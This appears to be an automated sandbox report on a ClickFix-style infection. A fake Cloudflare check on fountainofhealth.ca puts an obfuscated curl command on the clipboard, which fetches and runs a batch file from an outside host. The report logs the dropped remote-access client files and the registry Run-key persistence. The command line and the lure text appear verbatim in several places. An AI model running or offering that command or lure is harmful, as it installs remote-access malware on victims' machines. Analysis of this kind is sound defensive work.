Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll

Source: C:\Windows\System32\osk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\tar.exe

File written: C:\Users\user\AppData\Roaming\Dire\NSM.ini

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source:	Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter

Source: libopus-0.dll.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll.31.dr	Static PE information: section name: .xdata
Source: libopus-0.dll0.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll0.31.dr	Static PE information: section name: .xdata
Source: libopus-0.dll1.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll1.31.dr	Static PE information: section name: .xdata
Source: PCICL32.DLL.31.dr	Static PE information: section name: .hhshare

Source: msvcr100.dll.31.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Select 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: 0K Cancel Browse... Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video visit value very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Enter} Open: Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare Windows key+Space. ENG 15:40 p Type here to search
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Move the cursor to where you want to enter text. Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: about:blan Home Fountain of Health e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Hcme I Fcuntain cf Health - GccglE Chrcme Home I Fountain of Health - Gom by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause s Shift Shift Del ScrLk Dock PrtScn > AltGr Ctrl < Alt Fade Fn Ctrl Optidns Help Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare V,/inclcws key+Space. ENG 15:40 p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video value visit very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard Clipboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Can't show history See all your copied items in one placel Turn on clipboard history naw. Turn on Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. " ramOata\cvcv.bat" Enter Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: about:blan Home Fountain of Health On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: Chrome DOM: 0.6	OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 4nkbyi8avf Performance and security by Cloudflare

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter

Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\client32.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\hw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll	Jump to dropped file

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PP1
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PP1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\osk.exe	Window / User API: threadDelayed 2000	Jump to behavior
Source: C:\Windows\System32\osk.exe	Window / User API: threadDelayed 361	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Window / User API: threadDelayed 549
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Window / User API: threadDelayed 9104

Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll	Jump to dropped file
